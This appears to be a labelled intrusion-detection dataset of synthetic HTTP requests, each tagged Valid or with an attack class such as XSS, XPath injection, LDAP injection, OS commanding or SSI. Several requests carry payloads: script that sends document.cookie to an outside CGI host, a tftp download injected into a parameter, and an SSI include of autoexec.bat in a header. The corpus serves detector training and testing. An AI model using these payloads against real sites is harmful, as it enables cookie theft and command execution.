GET /0HFeL0tfGRsCY26dQ9u/a1Q1hudB/d2sge3lue/MdZ6by7yJ1MQ5/ssmthen.jpeg?tse3iasbdTlAt=hl&8ithmkaenAuW=lsWeI8eaudxa9Uet&yoaxrSxre=%3Cxml+++id%3D+%22++++X++%22+++%3E%3Ca+++%3E%3Cb+++%3E%26lt%3Bscript+++%3E%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.rori.com%2Fcgi-bin%2Fnaetseesre.cgi%27%2Bdocument.cookie%29%3B%5D%26lt%3B%2Fscript++%3E%3B%3C%2Fb++%3E%3C%2Fa+++%3E%3C%2Fxml%3E&RllsQA=H0t4%29koh%24s%7Ci&TehjaeHlft=96042&eHwtsF4Ios=247467 HTTP/1.0
Host: www.EaNaiori.be
Connection: keep-alive
Accept: audio/x-wav;q=0.1
Accept-Charset: *;q=0.3
Accept-Encoding: identity, gzip;q=0.9, identity, deflate;q=0.2
Accept-Language: oe-t, cih9hO-elssdo, eeg-memne;q=0.0, Fr-efghns8
Cache-Control: no-transform
Client-ip: 3.233.223.248
Cookie: 4ae=|dnxp_motlocationbtkn\rey;heenwht4=cYp
Cookie2: $Version="75"
Date: Mon, 13 Apr 09 20:45:07 UTC
ETag: "q3-IpkwztXwbCovTL"
Expect: hhr4=sfe1
From: wu4c60i@McindieetT.fr
If-Modified-Since: Tue, 11 Dec 07 04:02:40 UTC
If-Unmodified-Since: Sat, 20 Dec 08 08:35:49 CET
If-Match: *
If-None-Match: "uWgmd0ocJMciF1VU"
If-Range: "gI9m98@iivJ-4YmZAa8"
Max-Forwards: 2805
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: Basic aWlsNm86a2h0eQ==
Authorization: Digest realm
Range: 064-,-6198,422476-
Referer: /1gtdd/aenwe.ace
TE: trailers,chunked,gzip;q=0.9
Trailer: Accept
User-Agent: Mozilla/0.3 (compatible; Lurmor; SunOS sun4u; TnnltAtr)
UA-CPU: StrongARM
UA-Disp: 213,2027,8
UA-OS: FreeBSD
UA-Pixels: 3411x5439
Via: HTTP/0.0 47.6.191.167, FTP/2.8 72.223.118.70, 3.1 59.64.29.217
Transfer-Encoding: gzip
Upgrade: DilEe/7.0, ibtxn/3.8, a7else/8.2
Warning: 417 www.nmwhs.jpg "hngvi5nseoeon" 
X-Forwarded-For: 129.38.22.254
X-Serial-Number: 8754080340538
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47874
Start - Id: 30907
class: Valid
GET /xVKIe@t2dIkxza/i27VVnZCPdytmX/VTandeB_X_o/3u/Ulsgi_LN/3Gc.html?e8hsta=039937&GOP1Z%uq.VIDform=hWKom1Cg-uq HTTP/1.0
Host: 154.235.201.64
Connection: close
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ri-stlIEtS
Cache-Control: max-age=3
Client-ip: 97.216.142.149
Cookie: DkorTvduetsdsm=eo;aistNnpTheo=aoz0Hoglocation noe;n3et=3us m;tuopAvT=hiform
Cookie2: $Version="965"
Date: Tue, 03 Jul 07 17:55:44 GMT
ETag: W/"AUAbhpcHv6fysclWU9kw"
Expect: ycestrfr
From: O35r@NAzet.cz
If-Modified-Since: Fri, 08 Sep 06 09:19:35 UTC
If-Unmodified-Since: Mon, 19 Sep 05 04:47:29 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 13 Oct 08 03:32:15 UTC
Max-Forwards: 4838
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Basic c25lbDppZWRlbQ==
Authorization: Basic dG5pb2NobG46a0V0ZA==
Range: 7-19547,727449-
Referer: http://www.ardz.ch/gzOmshBi/RcjLa/s2aLwsii/szzSl.zip
TE: chunked;q=0.2,trailers,trailers
Trailer: If-Range
User-Agent: t6mpru/7.7.3
UA-CPU: MIPS
UA-Disp: 5927,611,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 1031x1153
Via: 5.4 www.iHqlikEd.htm
Transfer-Encoding: gzip
Upgrade: spiie/8.9, apg2sc/2.7, exuI/4.7, ndd/9.7, fnvse/6.9
Warning: 364 www.n0ehr.css:691 "oEieijPwonreuaI" "Thu, 15 May 08 10:24:17 UTC"
X-Forwarded-For: 61.167.250.228
X-Serial-Number: 7053586525400090779
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30907
Start - Id: 11083
class: Valid
GET /qFv50T9/i6/hoe/7L/a8kNW7P-G7tPbT./wneshoaa/hGbsiltaa/9u/MXd@E4/nqy9C_G9AWzZ/zWHZ/dzu1gAyfOg.pl?-tXlPO=qlnrh&SlRoet5dn=lnre%2Bopbgsoundfx&VselectcUGxp_orv41_xterm=993&Isosuacc0a=50483976&tewapcaydtyda=evalmiuceD HTTP/1.0
Host: 56.236.93.33
Connection: close
Accept: */*
Accept-Charset: x-mac-chinesesimp;q=0.0, iso-8859-15;q=0.5, windows-1251;q=0.4, x-mac-icelandic
Accept-Encoding: 
Accept-Language: *
Cache-Control: gtT3e=mR
Client-ip: 108.9.167.204
Cookie: srEemttinsre=3;hmN7go3iwwar7b=m;haunneohsg=RTlikedroptr/LorvsNupdatet
Cookie2: $Version="36"
Date: Fri, 25 Feb 05 08:13:53 CET
ETag: "HuunF4J5lrRhWPm-O5W"
Expect: 100-continue
From: ieonn@sehlybt.net
If-Modified-Since: Tue, 27 Apr 10 15:15:37 GMT
If-Unmodified-Since: Tue, 20 Nov 07 13:36:41 GMT
If-Match: *
If-None-Match: "R2bgp2mO7tRcfpgN8"
If-Range: "CioPEEvGHs6.LA6_WP0Z"
Max-Forwards: 4
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: Digest cnonce="ke4a"
Authorization: Digest nonce
Range: 62259-
Referer: http://caTn.it/p7natynd/rShhaa/lieeknr.zip
TE: trailers
Trailer: Accept-Language
User-Agent: SrTmeoVomlM
UA-CPU: PowerPC
UA-Disp: 0717,4017,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 948x5637
Via: HTTP/8.1 41.169.95.206
Transfer-Encoding: gzip
Upgrade: LwEo4c/2.4, leari/4.2, haaiy/0.9
Warning: 798 www.leeOy.tiff "xtasHAn" 
X-Forwarded-For: 199.237.53.206
X-Serial-Number: 881023416032
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 11083
Start - Id: 48673
class: XPathInjection
POST /rkxKeQ4IZ/oee6a4trAo.htm? HTTP/1.1
Content-Length: 107
Content-Language: tt,raEi7w
Content-Encoding: identity
Content-Location: /azex/dw6cf2/u8tE/nrrwnznt.pdf
Content-MD5: eXlubGlpcXN5Nm9hbmlmYw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 29 Jul 09 17:53:57 GMT
Last-Modified: Thu, 15 Jun 06 23:18:11 UTC
Host: 96.220.127.83:3
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: euc-cn, isiri-3342, x-mac-chinesetrad
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 94.68.181.174
Cookie: eageyc=t4raxwsn;6sNororcipiXn=pr+servicesrtw;sg=ubodyo
Cookie2: $Version="33"
Date: Sat, 27 Oct 07 06:00:49 UTC
ETag: "3.OeJwn1snCY3-uU"
Expect: fdei
From: e32rlse@ib5bceaa.org
If-Modified-Since: Sun, 26 Dec 04 08:16:46 GMT
If-Unmodified-Since: Thu, 02 Oct 08 06:32:48 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 16 Feb 07 16:51:34 CET
Max-Forwards: 2708
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Basic dHNlbTppbWhz
Authorization: 4snho cM2brwm1=rdelen
Range: 12-
Referer: http://stpos.uk/NiuTE0ha/saew.tiff
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: ap0I2 (yWGii1; h25M7XS; kItkzw_)
UA-CPU: x86
UA-Disp: 9891,852,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 2607x8764
Via: 2.2 www.adAnfHn.png
Transfer-Encoding: deflate
Upgrade: Bkmi/2.1, eLo/9.3
Warning: 456 136.21.126.138:79216 "9ErN6ntiDgwn" 
X-Forwarded-For: 32.231.214.148
X-Serial-Number: 9550547356245150782
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

KPeS69utmp=6266     or   khslo/ewe6at/n/child::node()[position()=108]   or   889=

End - Id: 48673
Start - Id: 14539
class: Valid
GET /Gv/eGHH2aP0_gqVcy_JyG2/rAn/l4nlotyiaDn/i1sRuPDRXV1.html?qors5tohe=477725782&5icc=iro&ridieishss=lQh%40K0Vppyxp&oaftrma1tyeys=k&eh0onsr0=eqJK.UGs&tytegsrchCe07=87&wxe6i2sio=nNW&usrMsdBK1ynx=584&Nst4varlvW05VO=iy%3Da&hsm=l8seh0auoy&cZdls=5539542911 HTTP/1.1
Host: 205.55.4.181
Connection: keep-alive
Accept: video/mpeg, video/mpeg
Accept-Charset: euc-cn;q=0.5, iso-10646-ucs-2;q=0.6, iso-8859-1;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: max-stale
Client-ip: 21.159.6.234
Cookie: ulhhaeLRtlyiboe=wherep;oluhhHuNca=otfAs;pac0=arongmtss4exdli;jUenadOd=dMU1;ham0T=06;nis1llt0y7euwr=010
Cookie2: $Version="8"
Date: Fri, 23 Oct 09 16:29:02 CET
ETag: "vCcBAqRPR5i-s-_Kr@S"
Expect: dfuOmt=Nehn4
From: izhee@mtbHevOaee.gov
If-Modified-Since: Sun, 31 Dec 06 10:03:30 UTC
If-Unmodified-Since: Sun, 30 Jul 06 05:18:23 CET
If-Match: *
If-None-Match: "hbv3gqbW5Z7KiMSgk.pc"
If-Range: Thu, 28 Oct 04 07:43:17 UTC
Max-Forwards: 2975
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Basic ZWlyYXRhZW46YW50TWdh
Authorization: NTLM aTc1c2kwb0VsdGhtbzJ1M1dvbmpzc1VyZGV0aGhhcW1kZGVPdGFtMA==
Range: 4019-22,-23,269-5
Referer: http://asa3eo.biz/3fr9sd/n74nthcn/h20jeuu/7iSee.css
TE: gzip,trailers,chunked
Trailer: If-Range
User-Agent: dsroe8a2rEdy
UA-CPU: StrongARM
UA-Disp: 2949,5264,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 3486x145
Via: neodyr/9.7 18.14.183.236:9
Transfer-Encoding: deflate
Upgrade: scAhts/5.3, ntread/5.7, ttaotf/9.8, Otisii/6.3
Warning: 202 www.tceh.js "i3meintolnieF2asaend" "Wed, 08 Feb 06 16:32:21 GMT"
X-Forwarded-For: 152.218.118.157
X-Serial-Number: 267686461
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14539
Start - Id: 43548
class: OsCommanding
GET /ta0cyicyofoycm1tnia/aMli0IGYY/KLT8iyrtx8varIj/NnynGtoIvrennhedpp/nVHhKdXAevwItZbAkLba/cMNaV@Yq6VHQ/ybC5lNAhFV2d/uS/fxke5optIlrE/ds-/ntedaosutegbpmlh.jpeg?aeedsrricwnw3ni=aiframe-&V_1netcatxL.Hf=+i%3Cakt&5bDwlHF9=HkwKdttoo&ix=nnktsystemhwr+iframemmbbrl&t2Rnt=8&keyftcrnuOtm=+whereertetlvSeem&dmrsaw=%27++%3B++++tftp+++++-c++++get+++++www.asiela.com%3A%2Fchllme.tar&9ienci1teO=uno&qeBeuyogoorih=382738&Zobject9kd9GGunph-zF=%40ct&4aoh5ter=6621&fromeDxjho-n40=wAWJ_73U62Pj&s_sFz3Zw=huhbjuecnsu HTTP/1.1
Host: 2.168.252.73
Connection: close
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=801
Client-ip: 214.70.1.175
Cookie: mtcaktjtsoRnl=ofrom;V@4PxVQ63=aJ_@OzJWwv3d;dd=55
Cookie2: $Version="17"
Date: Wed, 06 Sep 06 09:36:23 UTC
ETag: "60KWnTBuO0WR3pn7X4Yx"
Expect: 100-continue
From: nsaoonaw@rhao6t.cz
If-Modified-Since: Sat, 10 Dec 05 16:02:59 GMT
If-Unmodified-Since: Thu, 29 Mar 07 05:04:12 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 13 Dec 07 06:52:24 CET
Max-Forwards: 34
MIME-Version: 9.7
Pragma: SRbdEojh='dtoobay'
Proxy-Authorization: Basic c2NndDpFRWhiaHQ0
Authorization: NTLM dDZydXRoc2g4d2Uwc2Y5eHJzdDJwaGV5THR0b2lzd2l0ZUdvZnNpZWg=
Range: 510-
Referer: /loeevmlc/rosinliq.cgi
TE: chunked;q=0.5,deflate,trailers
Trailer: If-Unmodified-Since
User-Agent: idqbOw4mvQ http://www.feggw.ch
UA-CPU: x86
UA-Disp: 484,9177,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 559x227
Via: 8.5 131.17.146.193, 6.4 www.otiem0Rt.jpeg, HTTP/7.8 www.tec9.htm:6
Transfer-Encoding: compress
Upgrade: Bo4/0.1, iai/6.5
Warning: 755 www.rpcofa7.png "taotesry9p" 
X-Forwarded-For: 92.181.164.255
X-Serial-Number: 431097380
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43548
Start - Id: 37056
class: LdapInjection
GET /biw0ecwc/iRedefchteo/xXdEUsnWP/mocha0aD4/YDzHnph-sU2m0sam/MZa28kh-Mjvor/passthruvarqSallpoimgk0aOYonull/lJr/uuo.html?cmstge=seaorSEohaR&nnZ=1944197&A5eyeoe3etenog=rAeilncignmp&KJBeU.-Ucsystem=selsaofi%3Fbr%3Deu&rceii1rm=-9&on3=uie%3F&RtohDnml6=nullnpsA&sifaxueen=hxe%29%28+++%7C%28u7n2f%3D*%29&tjsgyest7ohe=hsIfEueoi0di%40 HTTP/1.0
Host: 182.8.128.150
Connection: keep-alive
Accept: video/*;q=0.6, application/x-tar
Accept-Charset: x-mac-roman;q=0.0, x-mac-greek;q=0.8, x-mac-cyrillic
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 52.88.110.99
Cookie: tmoo=625324;Ad4ndO=RlinkdftpeisL gtaek';cld=aZcylr8p;83CytYZu=9580
Cookie2: $Version="68"
Date: Wed, 22 Aug 07 09:27:22 UTC
ETag: "EHiX6-deO9OfaYi"
Expect: 100-continue
From: umuI@4eritQe.de
If-Modified-Since: Sat, 16 Feb 08 05:55:14 UTC
If-Unmodified-Since: Sun, 02 Oct 05 02:56:45 CET
If-Match: "tam9Wvcj.NPBOl5OhObA"
If-None-Match: *
If-Range: Fri, 16 Mar 07 15:56:45 UTC
Max-Forwards: 0
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: Digest opaque="isetlaxp"
Authorization: Basic bWFyczpzcm9hb3B1
Range: 03242-,-0
Referer: http://www.eefr.uk/ien3Dtht/asbeeu/e9nT/ybimo/eaagtt.bin
TE: gzip;q=0.6
Trailer: Host
User-Agent: Mozilla/8.9 (X11; U; Solaris 7.0; S5-ch; rv:6.4.3) Gecko/12285218
UA-CPU: PowerPC
UA-Disp: 428,496,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 716x540
Via: HTTP/6.2 www.OpSNh.js, HTTP/7.7 151.99.94.185:30
Transfer-Encoding: gzip
Upgrade: ESst/3.1
Warning: 047 34.25.200.147 "rrtrnbieiteop" "Sun, 03 Feb 08 04:41:40 UTC"
X-Forwarded-For: 143.102.250.73
X-Serial-Number: 595061014884085769
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37056
Start - Id: 47082
class: XSS
GET /refinsaanaholhiElebx/d5neaudpVrcaantecBd/ribM.shtml?oerceciIAmwoCs7=%3Cimg++src+%3D+%22mocha%3A%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.on.com%2Fcgi-bin%2Fries.cgi%27%2Bdocument.cookie%29%3B%5D++%22+%3E&s8osvtet=9665&gopAl5hwB=866163520&bpmadrimMpnqvh=g9XanyIpz-s&telnetUhncrU_43i3=94%2Ft2n&aWoosa7eojeei=rz3m28chTfFK&PxBbK1eds.AH=iINDIo4cHif_&_yoV=erni2MaixhcoennRe&cUH2bfF1D=cMmrdnie HTTP/1.1
Host: www.ensti.uk
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.9
Accept-Encoding: deflate;q=0.8
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 88.206.136.39
Cookie: ightNeedzele=k;ntteh2n=794;OEQlQM=n8pelShoreersaeRs;est=h ;4JO2=tQaMot-zsENP;qWa6wwbtlaa=148071
Cookie2: $Version="044"
Date: Sun, 15 Oct 06 24:48:54 UTC
ETag: W/"5flgWqTfDcqEkoyRjTt"
Expect: 100-continue
From: en3oiyg@ysel.org
If-Modified-Since: Wed, 10 Jun 09 06:41:16 CET
If-Unmodified-Since: Sat, 30 Oct 04 02:04:04 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 20 Nov 07 05:47:14 GMT
Max-Forwards: 4
MIME-Version: 8.0
Pragma: esannB=eoOt9ke
Proxy-Authorization: sevi uteRs=ionsesm
Authorization: gnvo rencD9rr=tnetr1o
Range: -409656
Referer: /taludet/teea7/esem0oz/endhtoe.cfm
TE: trailers
Trailer: Warning
User-Agent: Mozilla/7.3 (compatible; MSIE 8.3; Linux i586; aoeai)
UA-CPU: x86
UA-Disp: 016,6175,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 389x1282
Via: 1.1 www.oeiui.gif:89, 7.9 www.vtbyicn.jpg
Transfer-Encoding: identity
Upgrade: keTun/5.2, keYr/6.3, ierin/2.2, rla/1.3
Warning: 699 www.gnimlw.jpeg "bgtHtysIo0h" "Wed, 01 Aug 07 11:24:11 UTC"
X-Forwarded-For: 69.181.229.169
X-Serial-Number: 60697232
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47082
Start - Id: 49198
class: XPathInjection
GET /Dxrm/skju_rT/wEodZU3wcedIXz/edyyuW/ci2uh/y-PnsboL9-s/aisObdDlighLyrtu/tI/CjugoZid-E5jjm3/oqadreHcrl/s2UULo0.sh?2nd9=774&loaki=9027296&2rd=oawo&2s0treq=ehGApFn%27+++or+++++1nnef%2FRe9a%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D71%5D+or+%27eee%27+%3D+%27&cgdo6rIacnepea=aeocengtnctmihkio HTTP/1.0
Host: www.lxtag.st:4543
Connection: close
Accept: audio/x-wav
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: fu='tu1nzsrw'
Client-ip: 254.208.202.91
Cookie: jw1sHSNchild=st;rdkde=iy;rwteh1aeuen=mror;JhtpassPD=nSelreemorcanrptSn
Cookie2: $Version="0"
Date: Thu, 28 Aug 08 12:41:29 GMT
ETag: "ruPgw4wQy@KHv4cvV"
Expect: wlenof
From: Gswzt6t2@seem.gov
If-Modified-Since: Fri, 30 Jan 09 24:50:27 GMT
If-Unmodified-Since: Thu, 18 Nov 04 17:37:49 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 15 Nov 08 06:20:50 GMT
Max-Forwards: 3013
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: NTLM c2FoaU9qc3RsdG9uY2VodDg3a2Z4U3NsYWJpaWVhNTZ0bmVzb2g=
Authorization: Basic aFNhZWllRXI6ZWtyVGxsYWk=
Range: 943272-69165,-532,868-6
Referer: http://fasuln.st/Dtaniee/nyal/r23ete.jpg
TE: trailers
Trailer: If-Match
User-Agent: rnd8ioEZ/3.6
UA-CPU: MIPS
UA-Disp: 344,403,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 6245x946
Via: 3.0 164.15.193.254:1147, FTP/2.8 www.cme8.jpeg
Transfer-Encoding: deflate
Upgrade: awna1h/3.9, fneo/6.3, ayJ7mt/6.9
Warning: 143 221.24.90.70:6149 "atInyfjon" 
X-Forwarded-For: 19.241.14.123
X-Serial-Number: 094897870
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49198
Start - Id: 31503
class: Valid
GET /tewdltiaesbemls20e/h2/laBETKL9OH@J/WxiLR.QQ/nEtoziinesto/t9irfa5S1ah9tnpban/qV/amGuaorl.php? HTTP/1.1
Host: www.rxaooee.fr
Connection: close
Accept: */*
Accept-Charset: x-mac-cyrillic;q=0.7, x-mac-korean, x-mac-arabic;q=0.6, cp-932
Accept-Encoding: *
Accept-Language: *
Cache-Control: 3oL=huse
Client-ip: 192.51.134.227
Cookie: thhnj= glse;fme
Cookie2: $Version="6"
Date: Mon, 20 Dec 04 22:03:05 CET
ETag: "yxLr3g9SQkoN7YHAlI"
Expect: 100-continue
From: mstwBtp@pbnhonoigi.uk
If-Modified-Since: Thu, 27 Jan 05 11:05:25 UTC
If-Unmodified-Since: Mon, 30 Nov 09 06:50:52 CET
If-Match: "Iz3vIP9pv3YOGpGhie"
If-None-Match: *
If-Range: Wed, 20 Oct 04 18:46:08 GMT
Max-Forwards: 395
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: mFZ8s rirlpe=eoOcR
Range: 23269-,-0812
Referer: http://www.sezt.gov/aNqjamf.asp
TE: chunked,gzip
Trailer: If-Match
User-Agent: eXC0v0 http://www.it8Oao.it
UA-CPU: Sparc
UA-Disp: 0922,5668,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 484x1465
Via: 4.4 244.212.144.127, 1.0 www.grfc4.jpg, 9.9 71.172.203.142
Transfer-Encoding: nanln; eEiortit=eOEsmf
Upgrade: MOfb3f/5.6, Lad7c/6.6, lia/8.9, nrdo/8.5, dmy/1.0
Warning: 187 www.tdwd.js "edymttrish6s2ehurma" "Thu, 12 Mar 09 02:19:38 GMT"
X-Forwarded-For: 41.171.103.8
X-Serial-Number: 5515370509152
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31503
Start - Id: 32494
class: Valid
GET /ec1sock_streamEQ3Du9WLb/PQVxp_FVb36yE/3Kx-5bgsoundautoexecxtermZIobjectvMd/gcmdGS/lUHJ8passwd8IXDXy/eUd/8meihJlAenui/lUms79UK3s/BsamDgo.cfm?AUitwlhbaia=seTa&mails5DBYBTZd=hEgl6nbrwralPimr&tee=np1%28r&nd4=278&saktnbalr8tnmT=p&adoosSa=iDNu7jr&aua=73313057&DDfKwgetw=aoh8group+by&hiol=h%29gr&includew9Pbb=ngoSqe7d&eothmnrjac=78 HTTP/1.0
Host: 30.160.146.155:80
Connection: cmIdIie
Accept: */*
Accept-Charset: iso-8859-8;q=0.6, windows-1251;q=0.0, windows-1253;q=0.8, macintosh;q=0.4
Accept-Encoding: 
Accept-Language: 0eyx-rhcea;q=0.0
Cache-Control: only-if-cached
Client-ip: 53.255.204.193
Cookie: 4stTrei1ps=hT hcr&;oad=pui;7eeATlahyDgn=&dopaha;at>:zio;etur=08;oret=170985;nEurtOre=71395
Cookie2: $Version="6"
Date: Thu, 14 Feb 08 20:29:09 UTC
ETag: W/"6rh0t1CTplI3wx8.3"
Expect: 100-continue
From: l4x9ira@aGdrat.it
If-Modified-Since: Mon, 19 Dec 05 18:14:54 CET
If-Unmodified-Since: Fri, 04 Jul 08 10:16:48 GMT
If-Match: *
If-None-Match: "6tvcQmf-Nq-TH_fQYquu"
If-Range: *
Max-Forwards: 2
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Digest nc=7E1c1459
Authorization: t6d1 sYlndee=res4Dt
Range: 61872-,1-23590
Referer: /eWareAt1/esqeahp.jpg
TE: gzip;q=0.3,trailers,trailers
Trailer: Via
User-Agent: sewnoesmt
UA-CPU: x86
UA-Disp: 050,1094,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 5986x8829
Via: rn43e/9.6 www.esticam.css, HTTP/6.4 www.tMINa.js
Transfer-Encoding: gzip
Upgrade: ottr8/8.0, iwmS/1.0, oey/2.0, rief/2.4
Warning: 101 4.89.40.8:21062 "akHa4tdddrpeehjib" 
X-Forwarded-For: 236.106.207.155
X-Serial-Number: 31593732
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32494
Start - Id: 16522
class: Valid
GET /ii/tm/idATQxsujut1Z8@m7/8HVZk_8zQOldVQ/N.jrpel/6q@X25rtBc7kZ/dQtItLsUdRRyyCr_roj/aEflib.dll?O4e=eaelftuhl HTTP/1.1
Host: 124.121.35.109
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.9
Accept-Language: mero-ymd, te-nete5t, ra5vHlPd-krsc5taa;q=0.9, tunsl1a-z0sleb;q=0.9
Cache-Control: 0sahhdis=603
Client-ip: 32.51.86.160
Cookie: wetite=9
Cookie2: $Version="064"
Date: Thu, 26 Jun 08 20:29:52 GMT
ETag: W/"6FxU-._srjvGp2X"
Expect: Et2Sof
From: a3hb@rjzaoeAala.com
If-Modified-Since: Mon, 24 Jan 05 15:12:17 GMT
If-Unmodified-Since: Mon, 11 Jun 07 09:28:46 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 21 Oct 05 15:22:30 GMT
Max-Forwards: 977
MIME-Version: 0.5
Pragma: whfa=aKtd
Proxy-Authorization: OeomE lOouinza=iyto
Authorization: Digest opaque="sne3hhi"
Range: 6-18279,-9207,2-
Referer: http://www.eem8r3bE.com/p9er/mhuii/Mexledpi.cfm
TE: chunked
Trailer: Accept-Charset
User-Agent: Mozilla/4.3 (compatible; MSIE 4.5; Windows NT; bneoDeluY; rfutius; sirx)
UA-CPU: StrongARM
UA-Disp: 439,238,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 599x133
Via: 5.0 58.159.6.220:918
Transfer-Encoding: gzip
Upgrade: lwl/7.6, pratqs/7.3
Warning: 376 www.ycezutrm.jpg "nens" "Mon, 03 Mar 08 23:13:28 GMT"
X-Forwarded-For: 59.247.137.64
X-Serial-Number: 05592727151
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16522
Start - Id: 8925
class: Valid
GET /nzrh.dll?sjtcotst2h=eJI2SI&KCvoevalW9e3zK=lTe&yhqd=frpr HTTP/1.1
Host: 17.115.238.41:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: identity, identity
Accept-Language: igrcaInS-f, t9nia-asjad9;q=0.8, uhapR-Iaty;q=0.3, so-nbym, t0-0mtO
Cache-Control: only-if-cached
Client-ip: 214.41.97.175
Cookie: ef=hboot.inistyleahttgot;jkiohhhaoi=9rilf;gsvactpi6oLnM=eegwDQc7v;ytie4oal=523;nto=0d\
Cookie2: $Version="266"
Date: Sun, 06 May 07 17:52:51 CET
ETag: "uFE-_kgu.LR8l0_S"
Expect: 100-continue
From: gyture4e@b1eUnPsa.de
If-Modified-Since: Wed, 20 Dec 06 13:26:47 GMT
If-Unmodified-Since: Wed, 29 Jun 05 16:31:21 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 06 Jul 05 10:21:56 GMT
Max-Forwards: 287
MIME-Version: 1.1
Pragma: w=lak
Proxy-Authorization: Basic cm9kMGhuMjpvYUl5enZvaA==
Authorization: NTLM dHNuV2VlZWppcVNueXlvemVma3lpcGVld2RyZWZlYWV0dXVPbmxlc2Y5QnRkYQ==
Range: 7-3572
Referer: http://www.e2eneE.cz/s7ttemu/shueHhtd.conf
TE: gzip,gzip,trailers
Trailer: Cache-Control
User-Agent: t9LQoUNts http://www.s7rii.it
UA-CPU: x86
UA-Disp: 065,7616,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 3660x726
Via: 5.8 247.115.225.145, FTP/8.9 www.pteg.html, peu/1.2 www.lejttTe0.gif
Transfer-Encoding: ihe11
Upgrade: D54Tc/5.2
Warning: 571 130.163.218.71 "0rarimveh" "Tue, 26 Dec 06 12:43:48 GMT"
X-Forwarded-For: 219.111.245.62
X-Serial-Number: 010709448680546
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 8925
Start - Id: 40367
class: SSI
GET /arS/wRt@y3nT/goL4eOxMq_@43c-/iNeRoTvgoeyieRo.htm?su5Exgagwufta9=atnegtcgcW&iln1rhtd0=827 HTTP/1.0
Host: www.bw9j9OV3a9.st:334
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Cookie: es0cT=77rocnssiy5mimdio;a0iACmp=aeh Ud)1odeNAi o;nA25MR-Lfandpassthruz=Ardml0;ttCpp=etpn/ c;eung1tpo9ewee8=4rsTtSaonndhhuevwt;g8ndlttemEq=qySswT
Date: Wed, 16 Mar 05 12:37:14 GMT
If-Modified-Since: Tue, 18 Aug 09 20:44:37 CET
If-Unmodified-Since: Fri, 20 Jan 06 08:05:59 CET
If-Match: "mfV8e@t_cT9-KisT"
If-None-Match: *
If-Range: *
Max-Forwards: 620
MIME-Version: 3.2
Proxy-Authorization: Digest response="375AA67fFd3b4C5c7CCa0Abe89ed9D86"
Referer: /rqasd/ietw/Wnoi.jpg
User-Agent: <!--   #include   virtual="d:\windows\autoexec.bat"   -->
UA-Disp: 4495,595,8
